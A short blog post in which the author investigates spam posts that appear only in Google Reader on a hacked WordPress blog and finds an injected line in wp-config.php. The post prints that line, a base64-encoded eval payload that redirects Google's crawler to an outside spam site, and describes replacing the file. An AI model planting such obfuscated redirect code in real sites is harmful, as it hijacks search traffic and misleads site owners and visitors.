Tag: hacking

Blog hacked? UPDATED

This blog appears to have been hacked somehow.

This is my old blog and apart from a test posting the other day, I hadn’t added any new posts since May 2009.

Blog posts

However, when you view this blog’s feed in Google Reader it appears to be full of spammy posts.

Spammy posts in Google Reader

The spammy posts don’t show up when viewing the blog’s feed in Firefox (or Safari) RSS readers – it seems to be confined to Google Reader somehow.

Feed seen in Firefox

I also checked the backend mysql database and the spammy posts are not there so I’m not sure where they are coming from.

I was using the FeedBurner Feedsmith plugin for handling this blog’s feeds but I deactivated that over the weekend when I first became aware of this issue. I thought perhaps the FeedBurner feed may have been hacked so that if I turned it off, any cached spam posts would be cleared out after a day or so, however it seems to not only have persisted but more posts have been added.

Anyone any idea how this is happening and what I can do to stop it?

UPDATE –

With help from Ewan – I discovered that (after looking around at a lot of other files) the wp-config.php file had been edited. The following line had been added

eval(base64_decode('JGFnZW50PSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTtpZihlcmV
naSgiZ29vZ2xlIiwgJGFnZW50KSl7aGVhZGVyKCJIVFRQLzEuMSAzMDEiKTtoZWFkZXIoIkxv
Y2F0aW9uOiBodHRwOi8vYmFibG8ubWUudWsvIik7ZXhpdCgpO30='));

To be safe, I FTP’d in to the server, deleted the wp-config.php file and uploaded a clean one.

The site is now back to working as expected, apologies to anyone who was exposed to the spammy links.

I’ll now go back over the site again with the proverbial fine-toothed comb to see if I can find any other suspicious changes that were made to it.